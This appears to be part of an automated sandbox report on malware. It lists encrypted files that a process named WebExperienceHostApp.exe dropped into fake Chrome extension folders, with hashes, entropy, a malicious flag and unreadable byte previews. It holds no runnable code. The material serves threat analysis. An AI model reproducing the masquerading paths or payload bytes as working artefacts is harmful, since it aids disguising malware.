Preview:	...c....5 ..kZ..A\>Qe9J.:Pu...&..F..j9...q6.K./.....(....p...d..?'.....>..f..cp?:...cM...:B..1.g...[.U.......\.]...C.P^.........>U9...;V6..$..-...,.\|..!OC.\|r.....:.NR..TS....xj.o.6..H....4NWp.6..,.p.b.(.3.f....!l...}=.q.d..l.7../...%eF7....n..ck..-...........].!..u.FC..F....:..QeM.=C.....;....j.%m.5.....:J.\|..}..Q..(.s.S.~.6..;..._#.....d...c..G.B+\..<..K..u7.C..n.....pO..I,.{..%J....z.po...........ZH.r...C.yZ.X......r..o.......sMxM3.V.J.Y.!...$.y1....\bt...~.[..8......D..j..-.....zm.^.f.\Uh.%}..&G..X.."Xn..,%.lp...8...[q......_.+.<.u:=7..Ck8...\|.C........GEi%i...E.....F..W.,....hFk.s.)..Z.oB.Z.k.%.K..)&.QJ.....V.7N...1..w....LL...1.).7...JI.4...D.@t.%..V6Do4..RS...)$.u.........F...c....t..6v..........>...u..{.)w6..g..d.a.U...G8......i.P.Y..b..1`.0@.......6Q.b.Zi..pqH/.t49).y..L...T/.........C..E(rp.#..&4.'.R.D.&g...1.#X%..6.Q_5.#@..n.J.*.....L.(......U..J.......^.i.Z$h~7.....G.>M......r.%..y.C1.!.Rl1i.C..}...Hm.....xA`.~c......u:{

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.105

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34684
Entropy (8bit):	7.994905347328629
Encrypted:	true
SSDEEP:	768:4m6MPwIyqOxCrc/GJgepQwD1LqJHyRypeaO/2dBs5RDcjt+pFj6n:4hMII6xUSSgepQy10HuaOYIDcjtWjm
MD5:	C6A071F9E4EBBC40D788D9EE3EC7A701
SHA1:	A0909E50ED30C22DF700D12AA04852FA5EC35D50
SHA-256:	AA7B884110F01F236CE4E4BF71FFCFB5BFA529C5EB35148C724B57C63119F4BE
SHA-512:	CAA6D307DCC6CB3B0B38AA3A7AE3ED7AA9B6CBBE41563798558C2908C2DE31A90914F95237815E2D8F87205EFE5AA469768CD84488015F60C18861F93494B39D
Malicious:	true
Preview:	{.4.-L.........+..N8.....>.8S;&.B.H.I<...Dn=.....i...c........`..M..m...d.~ ........k..y.fS.)..!.-"..8...>$...A.......I.2........X....\|7&".....M..k@..Bw.....m._&.Y...9.<..U.5.........1..bB...F...2..c~...\Q"<.~...L...\|.x......K..j.:PH.,...Z.j.b.0..e.J.3R?..~.W-R?...h"..K.5..t.d.}Ak....I..,.~.....D.q6..>N....e.N.c..j../D..a.......x7...0.Y.2..Q.2.....I.....$H.8.\.r....D......^.L2..\|.x._.Bu..a>4'Q%.b<.r...h..J..u..h.V....."2.gH.....w.........o....ve....a..j..=a6...cE%..0.:jMU.;..C_N....Mb...Y......KA.VN).Lr..Dasa. .7..........N.uWHy. ..w2......."nA..K.Z....I.m.&)A..E...K4.E..x..wH48....#.............2./.F8./&[.."....s&.@D.:a..A....;.4...D.M4#.ys.....Q#...-..2.9DB.A2..I....H..$.L........Kp.....T,G`.A.%...... ..B.B.....^.......oZ.a.#A.m.. ..E.:`...U....G.....U...W.#.cL;-.i:G:%.$1G..B.w<by.......4.......n.i.Q.....~..L..i....-UH0."6..9i..J...o.5a..:..x$.....d^..P.Z...&Yc.O.....u..@;..~.......E`<.......^j..<...M.8...JB.y....>..v:......'.V...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.106

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	98056
Entropy (8bit):	7.998167444715926
Encrypted:	true
SSDEEP:	1536:5NfB96QKArtmwedP4QnzFeZgFGdKkPRuvMvMcBXxyOvAo41sEfyVoz32ervKNMR3:5Nfj/nJ5eiwxIfkkQvMvMcBBPX41RfyC
MD5:	D3CF1EB7E9041D68473E89B6602DB0A5
SHA1:	630D2557D2D6E4A247347DCF23D0922E7B88B0EE
SHA-256:	C4B853D65370A1075C03CBEFA43F9B13F75D6A6CF4B525A2C418B3678D3A703A
SHA-512:	6CB9BAB03A2328ADCE5FE8994B78DBFE088A0B473506AD3FB23E07071CD4043A313DF91EEAF1D825C57A3E8D7FFBE8702EA216A4184F7BC329F4F961CBC7E420
Malicious:	true
Preview:	..p..... .<..pR.~....O ..kt...l.x.K.....f.M....W.......9..k..x.x#..;.UK.r.Q...O...l.F..W.\|.PU..b.WLP...S .....l..o..?..>e.4t.YY..;\|.....Krx...$..'!D.GT.V:.R.\|.c\ .y..CQ9.J:._..M]L.L?.....F...q...ub.#b+.&'{>O....\|K2N'b...eG.Z\..k..iq...R.)U.....R...f.!S....A....tx..pcT.`w.22'........7f...Yu\|$...?.......Nii.....bL.2...Cfe>..}..V.F..^MKv.......qb... ... ...$8X..t5..vs..N...4.w.on.[..eJ..P..n.}..-.f.}6e...Os...Kf....R-Br..y..[L..\|..<.Z......G7\.!q~.#....[..V.o...N..S.n..M..0Y.{.>...5...f.Fh....d...u}N.0......../&.j=uK.I..(j.z..`.L..Z.c.~...t.".>&.j.?..Q.X#\|~...".Sv. h\|.9y.5.".F6.H.g.X.u.\|.g./...A.i...Z.l.\...T.~..Y...E.$}...fh..iC..}..-bM.....GjV...Yt...J...4...N...v.#l....s.H.=1.K./]..0.w.2..3....k...%AN5P.HQ...;.qpz....C.q.....K(....'.2....^...Q.f.....'...w..n..G.......J...Y.Q8...%.-..p....C&.,....w.n...]CN.....[..!...p..z...2bg>:..M..w.......#...6......y.z.2_..;{,......>8L.s..R ..TUsNG...."...K...yU.m..l-..R...dEX..kL..?.oaR3...u

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.107

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34684
Entropy (8bit):	7.995168454589623
Encrypted:	true
SSDEEP:	768:tpip6syW/aY8470KOXOgKSeSgnuSSE+nPoeNJFc:tJVWW+zSetuq+PRJG
MD5:	8CF4D3AA8024D528D346BBFCD432E596
SHA1:	A36BE219C6C48EEEA519C1995A3174CE9DBD153C
SHA-256:	BF356B2BDB4DA5A8282F418B0BAD391067969B6FD80D2954810D817253355D9B
SHA-512:	1FF0D1AD81519C678B612E4022E91B554EA67D13A00E6CB54FEA09E96793543A31BCF388B9406AA80A2D7BB77988642C8629BA638A1BDA1CADA882EEC1E06A5B
Malicious:	true
Preview:	!R[..h.B..N..Y.A...qAY].....\|..0..]@....;..{d;.d...PS.......hRs{..>.HF.6F #[..ZKB2..p.)Dj.s....F...o..4n.#.N....G.e>..b....+.GH.\.H.p4r...4..........B2... .n.Je...DE..9.(au.j.x.R.:..FIK...#..W..-...Q......KG=}.4..w.."..c..s....}.4.....90..3..k.Je.i6.\|.:...o..B(...\|...NN.!mD.....L.-.bJ.L3Qz......[......Vr(9...B.F..d..S.x!~19..?n...)F.. /....V..8..;.....9....5\|C.....D.Y...A<..V....R.........i..........H..!..i......?S..Cm%..X!O...u[..>..l.....\|.8 .B.4...K.)....nWh..g..4>.......U.y..%L`...".x..7...GJ.........t.'.@^.&..~w."...+t.<..._."`-.U...]....S...............@<...xe.wr..5Ff.W..q....1..."...9.[P 0.Nn.q..D%....G`1).oA.f.5t..~.6...x.L'..^EY.."....!-QN..r..d.(....F..AC.......G<.~.eS....Ru......n.c.../ 3.@...&...7.....O.9*1(4.)xu...(.fV....SK.(QE.6.:6j.B.d=.1..B..../.H........[.._f...`...K...........3E..CK.Mj..:b.Ip...o&@..1.(x..i!.i.,...1..."..9.;.]J....>.A.U.x?O.u....j..9T....w..U/.w/.7..,.lp..1!,h..y3.4.~.@/..{....A.....b....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.108

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	8404
Entropy (8bit):	7.978169844008558
Encrypted:	false
SSDEEP:	192:IF0nPmdKIk/OAKGPfS+ppT6brkQxYZaKmvNflfD7mdmSHNiIdwUO9mEj:5+dKnOrGPfSopT3TmvNflfDyLTO99j
MD5:	40B175B73BA17213FC66C841611287FD
SHA1:	AD2BAF9F8C6A15085AA450BC8FF5BD3389C4BFAA
SHA-256:	50DBCCC08F41A0147AB2CC1E2E4DA1B7A1A95B50B7D641193714E37B2F286F32
SHA-512:	0996675ECC2D2B02F68885DF0330E8AC37CC9154E46405D54D3841749507B36D401ABA782988D1EFD805A24997AB6F2DD5D8D50044CB5AA1C881C5235AFAF60A
Malicious:	false
Preview:	....V.....1.r..zO.....m.v1.l4.>....4..........d...T..5..l...m...lN8.v=C.......]..?..+v)^.~.7.a..6...%.Qf.....[..^u.r.D.7.......j......}@&.v....M.Z....}6...Op.. $....@igD`Q.".in...4.>s..;.....i....{..........r.....G.V...>..=....0i..h....5.m.....;0.0=2.."n..l.....7..B..{.HU...-.A...:.G.....\|.2....6.....9...?.......%......'1.."..#x..36..0k..s..R.K!....].................s..}.....9H...w.[.. J..[... ...S"..._.f.......<X.;.w.y.}....{...O>.M.&ow...[.u...@S,..F-.....5......0......c...-..i.t...%.......,83...c.ad.....t..W\|....w...._.......>.....6.....a...[jl"......o....Z......q...Gz!n.'.\.Z6,.kdc>.......W...T.7.?. .Pe\|`.i....`.E.R.j..7..`[.....8.p....04....;2Z.,.Q.f~/..T....7...1UD..k..DH....?3K...V..y.....k.....p.?O~....#..K./m7.S...,."...Q...(Xbp._#...`k_:KN..-.:......^Xcn.7..G..:...Q......F!TE.E.c....}pux.C..j..b...p..o.9.H.!...2...\|=.*PL?.!..#.@.H..X........ii[@.....3...f.\....^...... =LKI7..p.1.....?......0....$....SA...y.70.p..$......M.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.109

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	96884
Entropy (8bit):	7.998298845368549
Encrypted:	true
SSDEEP:	1536:1pGSEGGRz58GNaNft+tGlLxMwvFFoSr0ptR0d/iJnJQLz9HaOM:1pn/Gt58Geft+tGNCmFRdiJpOM
MD5:	149E13F368075782140E3E1D6DA50CBD
SHA1:	8779406F7BFC4ECE79A6F90CE2DD0B075A084C16
SHA-256:	7F6A9450C3A336173D30B97F9E530760262BE74BEF494D9CADB0D9849CC2DF88
SHA-512:	C477C8682934A27DC9E099DD015708CF34392977B5CE56C70F6ABBA8BD019093FF9C8D53BB9E5FA316D718154F9A3A4688149E0B12186549D51CB3A928F71529
Malicious:	true
Preview:	.!>...{.......4?W..E..+.<.V...7<@D.]....SM.7.Ez.T.G...q......z.)....L.\U..v=+_.....Z.l.bs?M..ea".Lwm...}..F.j.....F..E..K..N...^..\|.6.a.@K]N...Q......7.I'..>o....].(S...A..+%[..i.....M.x....[;.E.J..b..~..(_.........?H(D$....um.@[Mt..z...'g+wF'i.=...,......F.jx.V.qc.....K...)%O...\|hCd.Ht...=.W......<;y>H..1.c....>t...qR..t.8A.-M.:..P.q.M."'.!.{..B.r..!Z......_...b.f..0..E.>-......W....R...K..1.}.N...^wF}4\|.H?............?8>..~0..r...t.......a\{.o?#:.S:o....E.a.>....O...oT.aU.....:I.Qv...n>.....m.G....I.....S5>X.a......C%&...&..x..f.+UD....`.....?...P..........&7.C6..2:.h......AX..v..7...`.?E..8A..\|...g..6\...&......f....0.,T.Z..sU..B.[..}p.Y..&.l.D:.......>.....)-....m6[...k../J..1......../...>...J...-.w.%B...f..l}..2..9L;.N).T..D.y../u#}.....zF.`...}.U.'1af..."".....N..by..Q.....Y....X..L........P..im..O..lv...}....q._F3$....=.QB...-SS...x..N....x....8....s..M4.2.r.........."..{X..4.q...I-N.bO5+...'.T.Z.qj.Q.^T.8....I.T..7T..b}......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.11

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	30266
Entropy (8bit):	7.994046482138979
Encrypted:	true
SSDEEP:	768:3IDNXI5O2qKR8Jy0xs6551vHEM2pMg3sjqi9:3c5lKR8ZD5TvHEPm9
MD5:	4BC9390003135993497C35E68F293E72
SHA1:	D1A40B3E0D8EC6C7E4BAFDE2EB68FEA80815FFE8
SHA-256:	817E3100FD0C68830124638535BC55D07A7B013D405BF3E998B9CFEC1DE983CE
SHA-512:	24EA981EB3952FB0D2C1AA53A41DE8955671EAD95229045F1198E0AD2D8EB14EE555E50E70DC991331DD38E0C24611E7B91F32095450D0811C69FAF287E903BD
Malicious:	true
Preview:	.L..\|@.........S.....s.L../.i.,elw..G....".X...H..........S,.Ia.h.k.....MTR......+...[Kb..k..cg.:........J..~.....Th.....x.._.>....#I.@.>b...&./...._.=..(....\|...8#."....W..$....7L._l..x(+_rZ...Q...?z...8.....+.+.#+.....]-..........Q.22;..[`..N9......p...cK....G..N..[.,.D.c...l.O...........\|M5.0.#y:...G......=K..~]m..y.}e.'.....(.$.k.5m.+...;7l.d..G$......m....mZ).X.%.......u...QX...9k.v..{.....z....F.V(\|}HK.2`k...JVJ...7HP....P....r..Tf..}..x=..........-$.?...wJ..}{~../.8G........~..u.YP.c..j.v..6qn......a...g7..m..h...w.r..\|...:..vz^jp.1...vG..9..9.R.....e..>..S.....$C.}...s..i..63. j...#.t...7......9U.`.."...R.<{.\..'s..`...xRQcpk...x...J}.8...B).............Q^.C.U......v.B..1..m.d.]...:MG..."..$.Y.~N]..)l..HK.....e..2"kK{._....P..09....H...Y..i....:>0~.........jN`.G,.......]..`....{_..fM..}...).?..g.....bM..!.1.@..........?.nK..~....7..{...h....m..Q.,.`...&. .30....M.G"........w..}.r..KO.t.q.........L....;X...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.110

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	50153
Entropy (8bit):	7.996108103884875
Encrypted:	true
SSDEEP:	768:Q9B9iK7f1ZxocOwYOXzKCAFaTrhkn4gZ4Cm2soKVibTFagIKjCagea:a9iKD1vot8XLBhi3ZKFibxrpI7
MD5:	33B7F5B8E0ED698E32D0E594D9114F0F
SHA1:	4E85F72F715764F51C623FBC85894467F9FA57BD
SHA-256:	1572B0C05ACCE85F830727C44B6EF6634A3DCC3817406F9A59C732A3D22A9F98
SHA-512:	3EDE5E0EF097E05DBAA0F5B115DBDFB333960EBC83BEF10F97AE8C870C05FA172F71E61FD16F0212F01B4D08BE0F4979A57F1D4428718CF94DF918B8BABC02BE
Malicious:	true
Preview:	..GQ.T.Qu.6.u....{...e..u[.!....4.......;E...f...6.......}.%.xF....u. .Mm..$]..L...S...<...\P..d)...Y},.:8.A,....Q...vL%.X<...8.s.U.5x.eao.B.#.a+.QD]).<...Eq.c{...]0.q.F.p....TfjOO..=..i....,.H.=..gF..:.I...\|............3...o.@3....M...".b..v....~....j.d .!...1..UE..1....!.7.0~.t.[N/.,..8<m].E..,.N.u.hK}x..rAx.<p9.9...d.......&>u.=....[.....O..F{.....b=.......{.w.=.%N..ck@V_..\|l.d/.eJ+7/8.....U.B..3.JK...O\,.U.~BR.+.L.......Ga.........1.E.F_...1r.H.0.E.K.s.B.,..J............].!F.o.....6...oy#3.`I... .,z.c.#.O.....}..S,.ip.*h$%...v~z......@s.K.2...h"d..9.:g.....Y+.1W..)L.<4!.(.[E8x.w9...:...L....\..rj..<..W...1E.]m;S-W......5.....;.....i..@..N...T.C..1...T.f.........\|...;.!}PV...1... u...p.D.\|........0}._.,P.e.......,.El....!\..?...~$U....iL.._q]...04'N.\..[0.u.].....<.e...qCd........R..m%'.?.)U...m...u.....Q%.lrm..]..B....E..=...^Yq+........?...b..,1....@.{..IN...L....../L...H...Df.r........!i.=1T......5^.......d.q......@......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.111

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	159430
Entropy (8bit):	7.998674900992916
Encrypted:	true
SSDEEP:	3072:67nd8ai/g9PNcK4iz+Aoe1YEKphabflcMGv9XmAoPsD/hVtNPEdHwnWwmr:qQ/waKBapuYEGEBHGv9r5/PtNPoQnWwy
MD5:	D2FFF6AF06A171F2F1C6276F28194969
SHA1:	96F62CAFAA6F1AED8C9D52FC45AD450671D387CF
SHA-256:	8C66468BFEA7DA7137B617D5FC554993F1D2170C81FC749359457DD4035545DB
SHA-512:	F4CC51E16F511423CF0B3D3995D4537F477E28A6985B1E34133088FB30A4A123379DE103C2C7344EF7776505D6EF27462E592A0D8741D98346E4DEF46E104228
Malicious:	true
Preview:	=H.BG<r..........V>+.zr.n......=.A..H"1....J.C.:..8w.d.G..a..w.YB.}.,'..bc..T%6.Fl.G,......w.L'rV.3. .+S..[....\..jWG..t.....d#9......b..Tq;...(....[:.!x.{..9..w.t.....5..........X....U...,FBW....W`.....Qb@.E.?<....Ms.".-..!w.....V.To.....?E..E..Ys....,].....bZ.]Y.?.x..xy..by?yhS.^..~2..IS..'....o....#L.LJ5...'.l. &..g.PJ....4..ye.:..-ZF..)....r...PV/...wD...:.`...xC........#..%..t.....j....^.$_..j..z....0.@?.6.v.h....5d...1.n.K....UB...T........@..(6...,cH... ..Y.4.....U2..-.T...A..].&..h U>/.W:.j1R..:....A..qz...........X].S.....y.'9.F.u.....P(f"..!........"X....\....hS7.....Y..s,..M.UU'......UA..$.oUo....H..+...g..vDA.`.I-.....=.EG..s.....}C/..`E.....3M."p...o.......x+. ........5...z......,K..>...RX......S{..uX9b.`....Q.x......5..`.....N..!s#..IO..xf.H\.Q.Y....k.\.NK...M..J.&E..XD/..a mv...8.B3.F..-.x(.u...j....nW.N...(.PM...g..3]...8RQ...g..... \..._.=...8D.q.[.[.OiE@tY'.....c%!..N:.....g....\S....9.s....v.....Y{}.;......}m..=.I

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.112

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	94418
Entropy (8bit):	7.997798184782707
Encrypted:	true
SSDEEP:	1536:mDAghOmFuBOh88Kw7EnH6VFmCDDIKCzfjR4XgL0Eu7A94DjQPIqPBLc19w5q8:mDAxLBOh8DdanmCDkKCzfjeXUe704Dje
MD5:	246BB6C39970DDB52E37F5FF55CD456A
SHA1:	D5AC3DC2E68A79339B35656D2067B238F2CC58BC
SHA-256:	BF91AA95EFD728F7F52704C21DBA03AD0E74566596EFFCFB540082E9EA29B811
SHA-512:	F5C72BA579A52B1709325C88FE4486AC15CD53475D2FD68E829D52C7524546AEF5F627DF7650E364D9AC2E3088CB79F4372F315BB5EF15E7D7240AC220CB7FDD
Malicious:	true
Preview:	...d/.n..\.C...`..I.x%[tt.f.r.y#x8b.m.z.E..+T..j.X.@,..I.......QC......V..e..\|V.4n..-....4...5..\x..#.5 nU'?.;Y..u.......b.2m.d....{...e...g...........&...].}.a...Id. ....8.K...U..`.b.....g..HM..O..~...V....3........7...<0...\|%D.0.1.t......._I.%Y..N..nL........Yz...6...F..=...1.x.b..0T.QM..+..v..L.%l..7..tn...7..E..d..q......t.p.u03.t....q..2..M..}..$.&.!.....\|..z"7[...I.......k.Qk)............q.....C...'2}.......7.H....Q?..ZPg%)mK...9...o...+4....'..D..?.:u...@..7?..........Q)...RV.Zs....{........w..M....f5..8g.v......I......,.5 ..w.g.<>7_q..'.+..!..V.......=....n..}.k.%.`.d..c..1..R.$.&..3.7...\|..J$'.\....X.....{..`qN.........$..4...Y..e.V.A....Q...WHo......G?...O.a. _A....k.-.....@-.>.: Z..M.v.tF.^..y...F.#.N+@.J...<.F[s..ak..MEd..(.....M.G.>.......G{.r&...?.........L&"......U.<\|1.....[kh...:? J.o........)...1.OS...-.&Y...-ep.....q..X.&P.......S.@.....d...So..F.uq=.HT...J.t....a....=.....o...*.......r..Y.\{.E.9.z^......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.113

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	96208
Entropy (8bit):	7.997915607079107
Encrypted:	true
SSDEEP:	1536:Xgm8H4M0ME5sPUM/JUYK5NeDVQozeD188b1eOeoFDlKfT8ZSN3EU2Wx3:wBbBnxwgVQozPDMW8INUU2W1
MD5:	123FB8F30949590BBFB7C7B84E9DE627
SHA1:	9A006D3731EADA372636B29FBAB6D420FCF03482
SHA-256:	EA96BFD53FEFF54E9F6B6C2F70F0967DE1BBD6D246055E66DFF0793DD29BAB1F
SHA-512:	40A25D3798C213CA452788560D9B736219A1B9C9098393283C22847ED56391D7785E9C75022D9DC0462FDBE139E75C36687B0ABCE15B28C8B5D44B577EE60401
Malicious:	true
Preview:	Z.uW_...u..#\.`V..8u..E......N...\|...u!7..%p......5.>.<."m.....h...C.rh..K-........c...C}...4I.'^..AW..?....h`...H.....R..}....c....~+.3x.....b..D(....G.......<E..ul$f..cn.....g..#..E~.n../.>.[........mkg.9.E....N...B...F..O..II)..t.D.....2..DO..:.&.u......gfH.....X.(.M..t.m~....hS....ZB.{.....B...%..`.=T......_.Q..F.j..C$..9y.0..L...........2l~..jA...OC.qpGd..T....K\......HI.........=...@..Z..'Hk..l?].....u<.P....B%...:... \|.r.dk..r.3[D..Jx.p.......6.K..mT..H..{>.O.B.w@-G... ....%fk.....G..9.z.......E..$.lz..h...A.EL...G..W..~..P..<Y%.Jxt...{.:..z;~...1.02....o.m/...%.A...(#.V.}B....2.Z6........G..E/..Dw......%FX.. 11'....~.L..m...B.0.a.(...t&o.Sx..^..;h#u.;.OtC.]./V....I.7;O.n=..8?..M..T.[..Ww.O.......c7.`...E.e.R.a...]ZQ.m......W..G.T.37\|G.kc...Z..D.TX...'.T...v........%.u....F..19..=x.V8_?..$...V...........nM..\..]Z...`...u.=...)}....>.].OM...JS..A.<..D.N..u..*(@..`I.)..Z.o.s.{I5...[...y....z..a......QQ.m

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.114

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	33415
Entropy (8bit):	7.994204014731013
Encrypted:	true
SSDEEP:	768:MTLFPNOvGH00iutaENLfJSVwl7yt4HypFxKsRJfdDzM:MTLFPo7u1Nws+/p5RxdDo
MD5:	AF4BB56B8867BBC361CC749FEF37AA0D
SHA1:	0E840EAF14CDD907AD26420655717B7A92EBE735
SHA-256:	17C1A997EC99FA547AF76966DBE4A90CA7939D0E02F068E7E30F842FC046404C
SHA-512:	EBE0510A5A89EA6F97305A4C6C67C2EE136480D6635350B4C61782352AB354BBEE4C0E10E31ADDCF10E51C4A0001ECCD2E2DCF2B7D23D50AB715FF8B9AA6151B
Malicious:	true
Preview:	...X'G..G.......t.....1..h...%.b.....'....-...b...)0..F...S..h...aBh.g[...,jPZHlc#.......F.7Ir.=....[..{..G.....\|.)..FU....M.........BG.\| .. {9o.qt.hM".<.....p,..(2.j\..7....B.[.?&..zu.......}_...p8...2.-..v...8eVp...@........~`..@.Z.Y....M..o....X.R...M.-..~..R.....=.....~.r.B?8..@.i..S..RW..g.hz2h.6..4Hj.......i.{...`....q.m..G...._..9.....'.>.;X..eu...m...L.@_....zu..w..d0.....4...'..d>.S.?...Z..&K.,.i......C.I.)y>^...!uqi.!l)..@.C/.E`.D..UZ.SYI....Zk..5 z.3.....).EMx..x.@.....P.w...-._l.;h2}.lk[..>..N_.'..LQ....m..ks....W8.........~.'.m../.f.r:.$u.r...uf)A.....\9Q..Y..X......J...........N..<..l...5..%6>S:...p..V.........A.4..d. ..[..b.......:kbF.L.Z9..a...8..po..:..8.q2.5.&b.#x.CSW.+. qY..l..X...3.......)...@C.lU]...Tz..P.kw%..`s....=4x$Q.\|.<..s........L..'.....J...P.Z..J?..'B>S.r.O.........6U<..O/.....?.k8.W~....'".o........ ..Q.k...1...\;vG...\|BP..:......3..s..._Ia%L..1.{..^.1\|.+..W}w.......`l...)(%..^..$...........$d9..w.P,.,t

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.115

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	84571
Entropy (8bit):	7.997608030604283
Encrypted:	true
SSDEEP:	1536:RbyvD7uQ4jQIvcsn8n33vWMclNTyyKv3AiSWnqhnwLZXSKomDL6UwwiqS929Aw:9yPaj3nZNl5KvzjnwnwLZXSKoS+jqSQB
MD5:	1807001C5F0279DA5ABC482CF0F656A4
SHA1:	5D4A2CF0DC4B0C2A2522C7742B7C96DB6CB76929
SHA-256:	0BDFBF7449A6207CAEFAE9879AD579D195000D9AC535D43F0B6730C869B07473
SHA-512:	93D08CEEE3C7FF2606ED4040D577AF373D219CDCF4FBEF8864441253D971ADCE4D4ADF4A7683C16A33D3DD843AF7A3AB75842343C2361C7E8E6D3DEEF06D91AF
Malicious:	true
Preview:	t}.u.E)..'.:."#I....( kC...+......[...+......k.>.....d...w...v.Gx.u...A...D..".........CH...../.Rs.bz<.r.\...$4HY%.W..s..I.............J.....&.O.'..<.....\.^.[..5....A...8..;...{...5.nI..}...I........nC.M.V....K8.q`...>8.Tk.......Oy.YM?...........J....~.{....._..I....q..G....d.6.O..p...[..NOD............)?.J..K..X..l%.='!..Zc)....p.._DE...<......H5.....zj8,_...C.Te_-6.V..sto-....XN^..A....f..U.a2.~......(&..I.6.D..h....$....X.qq......]Ws....L.C\......r.k.....?.../..g.9...{.=...M..3.%.&.a3..JJ....B....Y..t..........j.G.M2..........TF._s....B....IKI...k3l8K..X..........A.w..... .#Q....v.@.......&CK....@3.r...2.....m...v}..YWQ.%.c.@P.y.6'....+%a.1.y....e...k.5.2&l.+c.`..'.C.2........f.S.HKr..f.8n%E>.....)......P...4.3Bs.?.D..`...KT.d.sQ...f[.....^......rj.J0=.qr........b..$....."}....sY.z...9k.....]o.\|.....N.~.g...M=.1..SC....}[..q{&....S9..l]..........!.~..A..>.-.:A....Cnf.fN.\..\..K.>%-......83.Ge.?..@.\.."..*$....^.K`..7..A..v......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.116

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	27600
Entropy (8bit):	7.9941388261049005
Encrypted:	true
SSDEEP:	768:un8Rt9T7KMJPmDMhBmuTWZHsCv+OUmy7Wy23vwJB4I:vpBUYhBmuSKCvuFCyPJBL
MD5:	497F07BEC30357EE2256AD488799F2B9
SHA1:	6FF4C0CB541E40CC38900737770BF176901E70CD
SHA-256:	387FAD25299AE2DA33C5D0AC47C4EFF388A0591693996AEED2610407F6B1B9DB
SHA-512:	749916379365AF5AC6E0FC3F560EC5879986EEF29B2E0947BCC2A69D575BB950CDCC93F35D7FD4A7DF180C848925DD6067701A6EF5BEAB4CDC63D44F1C05EFDA
Malicious:	true
Preview:	e...6..7. ...L.u.O...0.Q..0!..O.z......[,.-S_..]..2AXf]..gE.SeF:R....ji.... .............l...s.........Myp.e]...j..z:...Y...P..;S,.8h\|B/._-&5>B..d.3]...k..y..D...........F.S..T&/..U.../Q.\)..../..R..1Rs.......K5SS.QR...y.8../\|~Tn$j.....z....r.\|.....L..`o@.(.e.D...9.;.(.$w.O.3...N...L.........u. X..$.A....}.....0O.._d!.2..I.^.b:~.qJu.`.E.Nv..4nI-...!..#..fc..b?..i.Me.rE.h...0..+.`...]...]4.`.W..r.S-.t<..+:.......:?Wv...0.....(.r......g.K....../...{......g.....$......s^.Q6N...... \e.M.3....R(.T.....,.>.ZZ.n>.,.s.A.4d.s..%.o......y.%T.'..3f$x^yC..17....=...Yp.....7O.x.n.. .,...w....!Z.....>Z.8....).Te.#Xnl..i.\|....+j..P.`p.Y....q......A.?.....E......1V....z..3..G.XouV..Y......$.F.?c....L?U...'..)...N....R1.%....}..V..`..z.d..0....6.#.5..Lwz.3..>..P..L7._.$C(w....-.W...i.b.....c.;O.......'....@.).p..._.....u.YL6.k/.-.{.<Nf.p.ij..m.<O!u."..!zj.[..P..f?...C&tbM..i..}.$KG../t6...6...?....j.x..K.6.=.]O.-...X.4..~.}..\|./._<.....L.HUvXU.8....^..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.117

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	99619
Entropy (8bit):	7.998358713854593
Encrypted:	true
SSDEEP:	1536:m9ObUyqUwE/q9HJXFhWhGNWr4n/ylyFGjXuzYnN9bzjuW2/nZHepyNxq6ZdEiV:wWUSq9HHh0GYHlyAXuyN9bzju8QxFdJV
MD5:	E6181E6EBB5F37D2442A12C5CDCB3BD8
SHA1:	411FD337139EA9A90860C4364699B239C2064D71
SHA-256:	22C5836D7EA401BCF86D1DE32ADE4E3981EEB9FF9FEF74F9212F82AAF9B4FCD2
SHA-512:	DAF528A41241A46D377F30A24C1895A934BFC2FB4C11CDF431D274A485A5633FF0FBA2A733C59C84920E841B932DE19F9D53D4EC810E1511248D705BAF6AE4D9
Malicious:	true
